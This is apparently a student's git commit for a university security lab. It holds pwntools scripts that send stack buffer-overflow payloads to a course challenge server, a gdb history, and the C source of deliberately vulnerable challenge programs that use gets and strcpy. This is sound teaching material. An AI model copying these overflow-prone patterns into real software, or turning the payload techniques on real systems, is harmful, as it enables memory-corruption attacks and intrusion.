Partial lab6

2025-12-20 15:44:03 +00:00
parent ef11ce0307
commit 82b7b8c565
15 changed files with 304 additions and 0 deletions
--- a/pa/lab6/.gdb_history
+++ b/pa/lab6/.gdb_history
@@ -0,0 +1,119 @@
 disas main
 disas win
 disas main
 q
 disas challenge 
 disas win
 q
 disas challenge 
 q
 p /x &buffer
 disas challenge
 q
 disas challenge 
 q
 q
 disas main 
 disas check_password
 q
 disas check_password
 q
 q
 disas check_password
 q
 disas check_password 
 q
 disassemble challenge 
 q
 disas check_password
 q
 disas main
 q
 disas main
 disas check_password 
 q
 b main
 r
 b check_password 
 c
 stack 50
 disas check_
 disas check_password 
 r
 a
 c
 disas check_password 
 b 0x08048731
 b *0x08048731
 r
 c
 p /x $ebx
 c
 stack 50
 q
 disas main
 q
 disas check_password 
 q
 b *0x08048731
 r
 si
 stack 50
 q
 b *0x08048731
 r
 p $ebp
 q
 attach 103318
 b *0x08048731
 c
 stack 50
 b *(0x804874d+5)
 c
 stack 50
 q
 attach 104773
 disas check_
 disas check_password 
 b *0x08048738
 c
 b * 0x8048752
 stack 30
 c
 stack 30
 q
 attach 106286
 disas check_password 
 b *0x08048735
 p *0x08048752
 b *0x08048752
 c
 si
 stack 50
 q
 attach 107369
 b *0x08048735
 b *0x08048752
 c
 si
 stack 30
 c
 si
 stack 30
 c
 q
 attach 111389
 b *0x08048752
 b *0x08048735
 c
 stack 30
 si
 stack 30
 next
 stack 20
 i 
 if
 i f
 stack
 disas check_password 
 q
--- a/pa/lab6/chall_calling_functions.py
+++ b/pa/lab6/chall_calling_functions.py
@@ -0,0 +1,12 @@
 from pwn import *
 HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
 PORT = 25153
 WIN_ADDR = 0x080486f1
 conn = remote(HOST, PORT)
 conn.recvuntil("?\n")
 conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n")
 conn.interactive()
--- a/pa/lab6/chall_match_an_exact_value.py
+++ b/pa/lab6/chall_match_an_exact_value.py
@@ -0,0 +1,10 @@
 from pwn import *
 HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
 PORT = 25152
 conn = remote(HOST, PORT)
 conn.recvuntil("?\n")
 conn.send(b"\x55"*64 + b"dcba\n")
 conn.interactive()
--- a/pa/lab6/chall_return_address.py
+++ b/pa/lab6/chall_return_address.py
@@ -0,0 +1,12 @@
 from pwn import *
 HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
 PORT = 25154
 WIN_ADDR = 0x080486f1
 conn = remote(HOST, PORT)
 conn.recvuntil("'\n")
 conn.send(b"\x55"*0x12 + b"\xaa"*4 + b"\xf1\x86\x04\x08\n")
 conn.interactive()
--- a/pa/lab6/chall_simple_overflow.py
+++ b/pa/lab6/chall_simple_overflow.py
@@ -0,0 +1,10 @@
 from pwn import *
 HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
 PORT = 25151
 conn = remote(HOST, PORT)
 conn.recvuntil("0.\n")
 conn.send(b"\x55"*128 + b"\x01\n")
 conn.interactive()
--- a/pa/lab6/chall_super_secure_system.py
+++ b/pa/lab6/chall_super_secure_system.py
@@ -0,0 +1,15 @@
 from pwn import *
 HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
 PORT = 25155
 WIN_ADDR = p32(0x080487d9)
 EBX = p32(0x804a001) # Has NULL byte
 EBP = p32(0xffffcdd8)
 #conn = process("./check")
 conn = remote(HOST, PORT)
 pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
 input()
 conn.send(pl)
 conn.interactive()
--- a/pa/lab6/check
+++ b/pa/lab6/check
--- a/pa/lab6/check.c
+++ b/pa/lab6/check.c
@@ -0,0 +1,30 @@
 #include <stdlib.h>
 #include <unistd.h>
 #include <stdio.h>
 #include <string.h>
 #include "general.h"
 int check_password(char* password) {
  char buffer[32];
  strcpy(buffer, password);
  if(strcmp(buffer, getflag()) == 0)
    return 1;
  return 0;
 }
 int main() {
  init();
  char pass[64] = {0};
  // we know how to make this secure. No gets in here.
  read(0, pass, 63);
  if(check_password(pass)){
      printf("Welcome back! Here is the secret flag that you already knew: %s\n", getflag());
  } else {
      printf("Unauthorized user/passwd\n");
  }
 }
--- a/pa/lab6/functions
+++ b/pa/lab6/functions
--- a/pa/lab6/functions.c
+++ b/pa/lab6/functions.c
@@ -0,0 +1,27 @@
 #include <stdlib.h>
 #include <unistd.h>
 #include <stdio.h>
 #include <string.h>
 #include "general.h"
 void win() {
  printf("Congratulations, you win!!! You successfully changed the code flow\n");
  printf("Flag: %s\n", getflag());
 }
 int main() {
  init();
  int (*fp)();
  char buffer[32];
  fp = 0;
  printf("You win this game if you are able to call the function win. Can you do it?\n");
  gets(buffer);
  if(fp) {
      printf("Calling function pointer... jumping to %p\n", fp);
      fp();
  }
 }
--- a/pa/lab6/match.c
+++ b/pa/lab6/match.c
@@ -0,0 +1,24 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <stdio.h>
 #include <string.h>
 #include "general.h"
 int main() {
  init();
  int test;
  char buffer[64];
  printf("You win this game if you can change variable test to the value 0x61626364. Have you noticed that the ascii code of 'a' is 0x61?\n");
  test = 0;
  gets(buffer);
  if (test == 0x61626364) {
      printf("Congratulations, you win!!! You correctly got the variable to the right value\n");
      printf("Flag: %s\n", getflag());
  } else {
      printf("Try again, you got 0x%08x, instead of 0x61626364\n", test);
  }
 }
--- a/pa/lab6/return
+++ b/pa/lab6/return
--- a/pa/lab6/return.c
+++ b/pa/lab6/return.c
@@ -0,0 +1,22 @@
 #include <stdlib.h>
 #include <unistd.h>
 #include <stdio.h>
 #include <string.h>
 #include "general.h"
 void win() {
  printf("Congratulations, you win!!! You successfully changed the code flow\n");
  printf("Flag, %s\n", getflag());
 }
 void challenge() {
  char buffer[10];
  printf("You win this game if you are able to call the function win.'\n");
  gets(buffer);
 }
 int main() {
  init();
  challenge();
  return 0;
 }
--- a/pa/lab6/simple
+++ b/pa/lab6/simple
--- a/pa/lab6/simple.c
+++ b/pa/lab6/simple.c
@@ -0,0 +1,23 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <stdio.h>
 #include "general.h"
 int main() {
  init();
  int test;
  char buffer[128];
  printf("You win this game if you change variable test to a value different from 0.\n");
  test = 0;
  gets(buffer);
  if(test != 0) {
      printf("YOU WIN!\n");
      printf("Flag: %s\n", getflag());
  } else {
      printf("Try again...\n");
  }
 }